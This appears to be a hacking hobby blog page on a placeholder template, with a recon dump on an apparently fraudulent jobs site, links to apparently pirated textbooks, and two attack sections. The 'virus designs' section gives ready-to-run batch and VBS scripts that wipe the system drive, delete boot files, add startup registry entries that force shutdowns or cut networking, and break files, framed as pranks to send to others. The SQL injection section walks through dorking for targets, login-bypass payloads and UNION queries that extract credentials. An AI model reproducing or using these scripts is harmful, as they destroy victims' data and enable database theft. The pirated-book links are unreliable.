ABOUT US

My name is ch.ramakotireddy and i will provide some use full information abouthacking and hackers.

OUR TEAM

The awesome people behind this blog.

  • katharine

    Head Hunter

    Smallest deed is better thangreatest intension.

  • Sam

    CEO

    Contented with little, yet wishing for much more.

  • Ramakotireddy

    Developer

    If anything is worth doing, it's worth overdoing.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • NRRMS vacancy .. fake jobs.. fake notification fraud notification full information

    FRAUD NOTIFICATION
    FULL DETAILS.
    National rural recreation mission society
    NRRMS VACANCY
    NRRMS JOBS
    ping

    PING nrrmsvacancy.com (43.255.154.95) 56(84) bytes of data.
    64 bytes from ip-43-255-154-95.ip.secureserver.net (43.255.154.95): icmp_seq=1 ttl=27 time=242 ms
    64 bytes from ip-43-255-154-95.ip.secureserver.net (43.255.154.95): icmp_seq=2 ttl=27 time=242 ms
    64 bytes from ip-43-255-154-95.ip.secureserver.net (43.255.154.95): icmp_seq=3 ttl=27 time=242 ms
    64 bytes from ip-43-255-154-95.ip.secureserver.net (43.255.154.95): icmp_seq=4 ttl=27 time=245 ms
    64 bytes from ip-43-255-154-95.ip.secureserver.net (43.255.154.95): icmp_seq=5 ttl=27 time=242 ms

    --- nrrmsvacancy.com ping statistics ---
    5 packets transmitted, 5 received, 0% packet loss, time 4000ms
    rtt min/avg/max/mdev = 242.470/243.180/245.395/1.201 ms


    traceroute to nrrmsvacancy.com (43.255.154.95), 30 hops max, 60 byte packets
     1  ip-10-0-0-14.ec2.internal (10.0.0.14)  0.409 ms  0.407 ms  0.411 ms
     2  216.182.226.52 (216.182.226.52)  14.230 ms 216.182.226.50 (216.182.226.50)  20.566 ms 216.182.229.180 (216.182.229.180)  9.771 ms
     3  100.66.9.138 (100.66.9.138)  20.974 ms 100.66.13.28 (100.66.13.28)  9.737 ms 100.66.8.212 (100.66.8.212)  19.425 ms
     4  100.66.39.110 (100.66.39.110)  15.655 ms 100.66.39.100 (100.66.39.100)  22.654 ms 100.66.14.36 (100.66.14.36)  18.727 ms
     5  100.66.6.253 (100.66.6.253)  10.722 ms 100.66.7.65 (100.66.7.65)  18.847 ms 100.66.7.67 (100.66.7.67)  16.077 ms
     6  100.66.5.169 (100.66.5.169)  272.171 ms 100.66.5.1 (100.66.5.1)  13.143 ms 100.66.5.123 (100.66.5.123)  16.865 ms
     7  100.65.13.17 (100.65.13.17)  4.887 ms 100.65.15.161 (100.65.15.161)  4.402 ms 100.65.12.241 (100.65.12.241)  3.941 ms
     8  52.93.28.173 (52.93.28.173)  3.948 ms 52.93.28.193 (52.93.28.193)  3.713 ms 52.93.28.189 (52.93.28.189)  3.875 ms
     9  100.100.2.26 (100.100.2.26)  1.649 ms 100.100.2.22 (100.100.2.22)  1.511 ms  1.561 ms
    10  ash-b1-link.telia.net (62.115.11.248)  2.400 ms ash-b1-link.telia.net (62.115.11.182)  1.760 ms  1.992 ms
    11  ash-bb3-link.telia.net (80.91.248.156)  236.034 ms ash-bb3-link.telia.net (62.115.143.78)  222.059 ms *
    12  las-b21-link.telia.net (62.115.137.39)  58.988 ms  58.902 ms las-b21-link.telia.net (62.115.137.37)  59.176 ms
    13  snge-b1-link.telia.net (62.115.134.42)  238.522 ms  238.051 ms  237.293 ms
    14  ae11.ibrsa0305-01.sin2.bb.godaddy.com (213.248.84.178)  243.997 ms  243.874 ms  243.874 ms
    15  148.72.204.5 (148.72.204.5)  247.456 ms  247.961 ms  248.128 ms
    16  * * *
    17  * * *
    18  * * *
    19  * * *
    20  * * *
    21  * * *
    22  * * *
    23  * * *
    24  * * *
    25  * * *
    26  * * *
    27  * * *
    28  * * *
    29  * * *
    30  * * *

    DNS Records for nrrmsvacancy.com
    Hostname Type TTL Priority Content
    nrrmsvacancy.com SOA 3599 ns03.domaincontrol.com dns@jomax.net 2019062001 28800 7200 604800 600
    nrrmsvacancy.com NS 3599 ns03.domaincontrol.com
    nrrmsvacancy.com NS 3599 ns04.domaincontrol.com
    nrrmsvacancy.com A 10799 43.255.154.95
    www.nrrmsvacancy.com A 10799 43.255.154.95
    www.nrrmsvacancy.com CNAME 10799 nrrmsvacancy.com



    Registrar Info
    Name
    GoDaddy.com, LLC
    Whois Server
    whois.godaddy.com
    Referral URL
    http://www.godaddy.com
    Status
    clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
    clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
    clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
    clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
    Important Dates
    Expires On
    2020-06-21
    Registered On
    2019-06-21
    Updated On
    2019-06-21
    Name Servers
    NS03.DOMAINCONTROL.COM
    97.74.101.2
    NS04.DOMAINCONTROL.COM
    173.201.69.2
    Similar Domains
    nrrms.com | nrrmsociety.com | nrrmsrecruitment2020td.com | nrrmsrecruitment2020ts.com | nrrmstore.info | nrrmstore.org | nrrmsvacancy.com | nrrmsvaccancy.com |
    Registrar Data

    We will display stored WHOIS data for up to 30 days.

    Registrant Contact Information:
    Name
    Registration Private
    Organization
    Domains By Proxy, LLC
    Address
    DomainsByProxy.com
    Address
    14455 N. Hayden Road
    City
    Scottsdale
    State / Province
    Arizona
    Postal Code
    85260
    Country
    US
    Phone
    +1.4806242599
    Fax
    +1.4806242598
    Email

    Administrative Contact Information:
    Name
    Registration Private
    Organization
    Domains By Proxy, LLC
    Address
    DomainsByProxy.com
    Address
    14455 N. Hayden Road
    City
    Scottsdale
    State / Province
    Arizona
    Postal Code
    85260
    Country
    US
    Phone
    +1.4806242599
    Fax
    +1.4806242598
    Email

    Technical Contact Information:
    Name
    Registration Private
    Organization
    Domains By Proxy, LLC
    Address
    DomainsByProxy.com
    Address
    14455 N. Hayden Road
    City
    Scottsdale
    State / Province
    Arizona
    Postal Code
    85260
    Country
    US
    Phone
    +1.4806242599
    Fax
    +1.4806242598
    Email

    Information Updated: 2020-02-24 07:52:37

    https://www.nrrmsvacancy.com/
    https://www.nrrmsvacancy.com/index.php
    https://nrrmsociety.com/
    mailto:nrrmsvacancy@gmail.com
    mailto:support@nrrmsociety.com
    https://www.nrrmsvacancy.com/


    https://www.nrrmsvacancy.com/states/AndhraPradesh.php
    https://www.nrrmsvacancy.com/
    https://nrrmsociety.com/
    https://www.nrrmsvacancy.com/pdf/DDU_detailed_add_AP_main.pdf
    https://www.nrrmsvacancy.com/states/AndhraPradesh.php
    https://nrrmsvacancy.com/Instruction_AP.php
    mailto:nrrmsvacancy@gmail.com
    mailto:support@nrrmsociety.com

    https://nrrmsvacancy.com/Instruction_AP.php
    https://nrrmsvacancy.com/
    https://nrrmsociety.com/
    https://www.nrrmsvacancy.com/pdf/DDU_detailed_add_AP_main.pdf
    https://nrrmsvacancy.com/
    https://nrrmsvacancy.com/pdf/PAYMENT-INSTRUCTION_forall.pdf
    mailto:nrrmsvacancy@gmail.com
    mailto:support@nrrmsociety.com


    https://www.nrrmsvacancy.com/image/nrlogofull.png
    https://www.nrrmsvacancy.com/image/120X160.jpg
    https://www.nrrmsvacancy.com/payinstr.php
    https://www.nrrmsvacancy.com/image/signature.jpg

    https://nrrmsvacancy.com/image/nrlogofull.png
    https://nrrmsvacancy.com/pdf/PAYMENT-INSTRUCTION_forall.pdf
    https://www.onlinesbi.com/sbicollect/icollecthome.htm
    https://www.nrrmsvacancy.com/image/150.jpg
    https://www.nrrmsvacancy.com/image/250.jpg
    https://www.nrrmsvacancy.com/image/upi1.jpg

  • Sql

    https://hackingbooksfree.blogspot.in/p/sql-injection-website-hacking-according.html

  • Books backup links

    Filename: Effective Python Penetration Testing.pdf   
    Size: 9.1 MB
    Download link : https://www.file-upload.com/s55s0l12zk9m

    Filename: Mastering Kali Linux for Advanced Penetration Testing.pdf   
    Size: 9.0 MB
    Download link : https://www.file-upload.com/kmwqaw4umltz

    Filename: Kali Linux Wireless Penetration Testing Essentials.pdf   
    Size: 21.3 MB
    Download link : https://www.file-upload.com/croge7v4i7hw

    Filename: Kali Linux Web Penetration Testing Cookbook.pdf   
    Size: 11.8 MB
    Download link : https://www.file-upload.com/pt771812dedd

  • Other books backup

    [8/16, 7:27 PM] Sonu: 📚🌹 *digital library*📚🌹
    *👉 Chetan Bhagath*

    *👉Sydney Sheldon*

    *👉 Health & Medical Books*

    *👉 Human & Body Books*

    *👉Management Books*

    *👉J.K.Rowling Books*

    *👉History Books*

    *👉 GST Books*

    *👉 Text Books*

    *👉 Many More Materials etc...*

             *❗Link❗*

    https://drive.google.com/folderview?id=0ByJLjeXGK6PUbnA3Q0hqcmd0dlE

    📚🌹 *digital library*📚🌹

    📚Complete package including links to download all the pdf books you will need in MBBS👨🏻‍⚕ :-

    Anatomy:
    1--> KLM for Gross Anatomy
    2--> Snell's Anatomy
    3--> BD Churassia
    4--> RJ Last
    5--> Grey's Anatomy
    6--> Langman Embryology
    7--> KLM for Embryology
    8--> BD For General Anatomy
    9--> Dissector
    10--> Di Fore Histology
    11--> Junqueira's Histology
    12--> Netter Atlas of human Aantomy

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LYV9KQ3lxY29FY28

    Physiology:-
    1--> Guyton
    2--> Ganong
    3--> Sheerwood
    4--> Sembulingam

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LdXlCSjdZM214dEE

    Biochemistry:-
    1--> Harper
    2--> Lippincott
    3--> Chatterjea
    4--> Satyanarayan
    5--> Stryer
    6--> MRS Biochemistry

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0Ld0o3WnhCR2VEczg

    Pathology:-
    1--> Big Robins
    2--> Medium Robins
    3--> Pathoma
    4--> Goljan
    5--> Harsh Mohan Pathology
    6--> Atlas of Histopathology
    7--> Levinson
    8--> MRS microbiology
    9--> Microbiology by Jacquelyn G. Black
    10--> Color Atlas of Microbiology
    11--> Kaplan Pathology

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LYkRYdjFrTm5MR0U

    Pharmacology:-
    1--> Big Katzung
    2--> Mini Katzung
    3--> Kaplan Review
    4--> Lippincott
    5--> Pocket Katzung
    6--> Rang and Dale's Pharmacology
    7--> Atlas of Pharmacology

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LMkE1UUVRZGwtTlU

    Forensic Medicine:-
    1--> Simpson's Forensics
    2--> Krishan's Forensics
    3--> Atlas of Autopsy
    4--> Atlas of Forensic Medicine

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LQXVwOGoyWnFSV2s

    Ophthalmology:-
    1--> Jogi
    2--> Jatoi
    3--> Parson's Textbook of Eye
    4--> Kanski
    5--> AK Khurana
    6--> Atlas of ophthalmology

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LOHc5WVZMdkJjX2M

    Otorhinolaryngology:-
    1--> Dhingra
    2--> Logans Turner
    3--> Color Atlas of Otorhinolaryngology
    4--> Maqbool's Text Book of ENT
    5--> Clinical Methods in ENT by PT Wakode
    6--> ENT at a Glance

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LaDY2a0lFNDlfTGc

    Community Medicine:-
    1--> Monica's Text Book Community Medicine
    2--> Mahajan And Gupta Text Book of Community Medicine
    3--> Bancroft's Text Book of Community Medicine

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0Lc1RCMml2NjhFNjA

    Medicine:-
    1--> Churchill's Pocketbook of DD
    2--> MTB Step 2 Ck
    3--> Davidson Essentials
    4--> Davidson Principals and practice
    5--> Harrison's Internal Medicine
    6--> Internal Medicine USMLE Nuggets
    7--> Internal Medicine on call bt LANGE
    8--> Oxfords Specialties

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LeEFJNG5TMlc4eWc

    Surgery:-
    1--> Bailey_love short practice of Surgery
    2--> Churchill's pocketbook of Surgery
    3--> Deja Review of surgery
    4--> Farquharson's Textbook of Operative General Surgery
    5--> Hamilton Bailey’s Physical Signs
    6--> Oxford Handbook of Clinical Surgery
    7--> Schwartz's Principles of Surgery
    8--> Macleod's Clinical Examination
    9--> Macleod's Clinical Diagnosis

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LRFpFSG5hZ1pVWkE

    Obstetrics & Gynecology:-
    1--> Case Discussions in Obstetrics and Gynecology
    2--> Deja Review of Obstetrics Gynecology
    3--> Obstetrics by Ten Teachers
    4--> Gynaecology illustrated
    5--> Gynaecology by Ten Teachers

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LMU1LRjFDa1FrbjA

    Pediatrics:-
    1--> Nelson Essentials of Pediatrics[
    2--> Nelson Complete
    3--> Pediatrics Review

    Folder link--> https://drive.google.com/open?id=0B3WdpdsqpX0LUkdTQkVuNV92Yzg

    1st Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0Lay1HT1d5Yks5V0U

    2nd Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0LemtmYXpYMGlydVk

    3rd Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0LWmlCSHBpUFpPZU0

    4th Professional Books--> https://drive.google.com/open?id=0B3WdpdsqpX0LbnJvUzk3NHRhWWc

    One Link For All eBooks--> https://drive.google.com/open?id=0B3WdpdsqpX0LQW5tbWEtUmJJY0k

    ➖➖➖➖➖➖➖➖
    📚🌹 *digital library *📚🌹

  • My books of outside sources and database's

    ** PDF Books **

    In need of any book(.pdf) relating to any subject/field or topic? go to your browser and type: www.pdfdrive.net and u will get access to millions of  books u need for free.
    Unlimited downloads. You may browse by title or author, etc Share with loved ones.

  • Sql2 and virus designs

    cript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop

    Save it as "Anything.VBS" and send it.

    Method 12 :

    This Virus Deletes All The Content Of A Drive...

    @echo off
    del %systemdrive%*.* /f /s /q
    shutdown -r -f -t 00

    Save The Above Code As Anything.bat

    Method 13 :

    This Will Crash Ur Computer

    Option Explicit

    Dim WSHShell
    Set WSHShell=Wscript.CreateObject("Wscript.Shell")

    Dim x
    For x = 1 to 100000000
    WSHShell.Run "Tourstart.exe"
    Next

    Save It As Anything.vbs

    Method 14 :

    The Most Simple Virus To Crush The Window
    It Only Works With Windows XP

    @Echo off
    Del C: *.* |y

    Save It As Anything.bat

    Method 15 :

    Virus that crashes pc
    @echo off
    attrib -r -s -h c:autoexec.bat
    del c:autoexec.bat
    attrib -r -s -h c:boot.ini
    del c:boot.ini
    attrib -r -s -h c:ntldr
    del c:ntldr
    attrib -r -s -h c:windowswin.ini
    del c:windowswin.ini
    @echo off
    msg * YOU GOT OWNED!!!
    shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

    Save As Anything.bat File In Notepad!!
    This Will Pop Up A Message Saying OWNED!!
    And Shut Down The Computer Never To Reboot Again!

    Method 16:

    Shutdowns Computer Everytime It Is Turned On

    Save As A bat File

    echo @echo off>c:windowshartlell.bat
    echo break off>>c:windowshartlell.bat
    echo shutdown -r -t 11 -f>>c:windowshartlell.bat
    echo end>>c:windowshartlell.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
    echo You have been HACKED.
    PAUSE

    Method 17 :

    Disable Internet Permanently

    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    echo You Have Been HACKED!
    PAUSE

    Save As A bat File

    Method 18 :

    Change Files To Non-working TXT Files
    Save As A bat File

    REN *.DOC *.TXT REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT
    REN *.MPEG *.TXT
    REN *.COM *.TXT
    REN *.BAT *.TXT

    Method 19 :

    System Meltdown

    :CRASH
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    GOTO CRASH
    ipconfig /release
    shutdown -r -f -t0
    echo @echo off>c:windowshartlell.bat
    echo break off>>c:windowshartlell.bat
    echo shutdown -r -t 11 -f>>c:windowshartlell.bat
    echo end>>c:windowshartlell.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
    echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    echo YOU HAVE BEEN HACKED BITCH
    REN *.DOC *.TXT
    REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT
    REN *.MPEG *.TXT
    REN *.COM *.TXT
    REN *.BAT *.TXT

    PAUSE

    PAUSE

    Save As A bat File

    Method 20 :

    Temporarily Flood Network

    :CRASH
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    GOTO CRASH

    We can make a batch file which will Shutdown the computer everytime on startup !

    Here is how ?

    ? Open Notepad
    ? Type :

    @ECHO OFF

    shutdown -s -t 10 -c "Virus Attack..."

    exit

    ? File >> Save As...

    ? Name it : virus.bat

    ? Start >> All Programs

    ? Right Click on Startup >> Open

    ? This open the Startup folder

    ? Paste the Virus.bat file here !

    *** That's all , now the computer will
    automatically shutdown on every startup !

    ) "I LOVE YOU" virus

    Simply copy-paste the given code in notepad:

    @ echo off

    :love

                   msg * I LOVE YOU darling....!!!

    goto love

    Save the file as love.bat

    Once you execute the file by double clicking on it, a message box displaying “I LOVE YOU darling….!!!” Will be displayed on the screen. Try closing it. You’ll enjoy it.

                                                                 

    Woking: Those who know ‘C’ programming will understand this quickly. 

    The ECHO OFF/ON Command is a command which will either turn ON, or OFF the command you put in a batch file from showing itself. Like, here we’ve typed @ echo off so it won’t show the virus code we’ve typed in.

    ‘:love‘ is a function you’ve created. And ‘msg * I LOVE YOU darling....!!!’ is the body of the function.‘msg’ is a command to display the message.‘goto :love’ again calls back or executes love function up to infinite times. So, it would never end.

        

    NOTE:- This Virus will not harm to your computer but it continuously runs on the desktop and will be a “pain in the ass”. Once you restart the PC and everything will be as usual. So have fun with your friends by this love virus and also wish your Girl/Boy Friend with this new type of Wishing .

    2

    ) "I LOVE YOU" virus

    Simply copy-paste the given code in notepad:

    @ echo off

    :love

                   msg * I LOVE YOU darling....!!!

    goto love

    Save the file as love.bat

    Once you execute the file by double clicking on it, a message box displaying “I LOVE YOU darling….!!!” Will be displayed on the screen. Try closing it. You’ll enjoy it.

                                                                 

    Woking: Those who know ‘C’ programming will understand this quickly. 

    The ECHO OFF/ON Command is a command which will either turn ON, or OFF the command you put in a batch file from showing itself. Like, here we’ve typed @ echo off so it won’t show the virus code we’ve typed in.

    ‘:love‘ is a function you’ve created. And ‘msg * I LOVE YOU darling....!!!’ is the body of the function.‘msg’ is a command to display the message.‘goto :love’ again calls back or executes love function up to infinite times. So, it would never end.

        

    NOTE:- This Virus will not harm to your computer but it continuously runs on the desktop and will be a “pain in the ass”. Once you restart the PC and everything will be as usual. So have fun with your friends by this love virus and also wish your Girl/Boy Friend with this new type of Wishing .

    2

  • Sql injection

    What is SQL Injection?
    SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

    Using SQL Injection attack method an attacker can get complete DB of website and User ID and Password can be exploded, an attacker can also Shut down My SQL Server and Server will stop working. An attacker can modify content of website and bypass login.

    Requirements :-
    • SQL Injection Dorks.
    • Vulnerable Website.
    • Firefox with Hack bar add-on.
    • Little bit understanding of SQL
    • Fresh Mind to Understand it.

    Step 1. Find Vulnerable website.
    An attacker always use Google, Bing or Yahoo search engine for searching SQL Injection Vulnerable websites using Dorks. (SQL Injection vulnerable URL is called Dorks which can be easily found in SQL Injection Vulnerable Website URL)
    First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.Use any one of the following…
    ► “inurl:admin.asp”
    ► “inurl:login/admin.asp”
    ► “inurl:admin/login.asp”
    ► “inurl:adminhome.asp”
    ► “inurl: admin.php”
    ► “inurl: login/admin.php”
    ► “inurl: admin/login.php”
    ► “inurl: login/administrator.php”
    Now you can use the following code and inject into user id and password field. For user id used admin as user id.
    And in password field use one one of the following code and some times these codes are also used for both user id as well as password.

    • test’or1–
    • ‘or 1=1#
    • 1’or’1’=’1
    • ‘)or1=1—
    • ‘or ” = ‘
    • ‘or’1’=’1
    • ‘ or ‘1’=’1
    • ‘ or 0=0 —
    • ” or 0=0 —
    • or 0=0 —
    • ‘ or 0=0 #
    • ‘or’ ‘=’
    • ‘or’1=1’
    • “) or (“a”=”a
    • ‘) or (‘a’=’a
    • ” or “a”=”a
    • ‘ or a=a–
    • or 1=1–
    • ” or 1=1–
    If found no luck with this method then try given below.

    How to Check for Vulnerability.
    To Check the Vulnerability put sigle Quote ( ) at the end of the website URL and Hit Enter.If the page remains same or Not found then its not vulnerable and if the page shows Error like this :-
    An error occurred...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near /contentPage.php?id=8 at line 1
    This means the website is vulnerable to SQL Injection.

    Step 2. Find the number of Columns.
    Wooo hoo hoo !! We found SQL Injection Vulnerable webstie now its time to find no. of Columns present in the Database.
    To do that replace that one single quote ( ) with Order By no. Statement until you find the Error message.
    Change the no. from 1,2,3,4,5,6,7,8,9,..... Until you get an Error Message like Unknown Column
    Example:
    www.targetwebsite.com/index.php?id=8 Order by 1
    If you get an Error on Order by 9 that means the DB have 8 number of Columns

    Step 3. Find the Vulnerable Column.
    Well we have successfully discovered number of columns present in Database. let us find Vulnerable Column by using the Query Union Select columns_sequence.

    And also change the ID Value to Negative, I mean Suppose the website have this URL index.php?id=8 Change it to index.php?id=-8. Just put minus sign -before ID.

    For Eg. If the Number of Column is 11 then the query is as follow :-

    www.targetwebsite.com/index.php?id=-8 union select 1,2,3,4,5,6,7,8,9,10,11-- ✔ And Once if the Query has been Executed then it will display the number of Column. Yeahh.... !!

    In the Above result, I found three vulnerable Columns 2,3

    Step 4. Finding version, Database and User.
    Now this time to find out website Database version and User Just replace Vulnerable Column no. with version()
    For Eg.
    www.targetwebsite.com/index.php?id=-8 union select 1,version(),3,4,5,6,7,8,9,10,11--

    And now Hit Enter : and you will get result.Now again do the same replace Vulnerable column with different query like :- database(), user()

    Step 5. Finding the Table name.
    Let us find now Table name of the Database, Same here Replace Vulnerable Column number with group_concat(table_name) and add the from information_schema.tables where table_schema=database() For Eg.
    www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--
    Now hit Enter and you can see Complete Table of Database.Great we found Table name now find the table name that is related to admin or user

    Step 6. Finding the Column name.
    Now same to find Column names, replace group_concat(table_name) with group_concat(column_name) and Replace the from information_schema.tables where table_schema=database()-- with FROM information_schema.columns WHERE table_name=mysqlchar--
    Note :- Do not hit Enter now.... First of all Convert table name into Mysql Char String()
    Install the Hackbar add-on in Firefox Click here to Download
    After Installing you can see the toolbar, and if you cant then Hit F9.Select sql->Mysql->MysqlChar() in the Hackbar.
    Enter the Table name you want to convert it into Mysql Char
    Copy and paste the code at the end of the url instead of the mysqlchar
    For Eg.
    www.targetwebsite.com/index.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 FROM information_schema.columns WHERE table_name=CHAR(117, 115, 101, 114, 68, 97, 116, 97, 98, 97, 115, 101)--
    And Now Hit Enter and you will be able to see the Column names :-
    Great Here we found Username and Password Column

  • ch.ramakotireddy. Powered by Blogger.

    WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    WHITE HAT HACKER

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.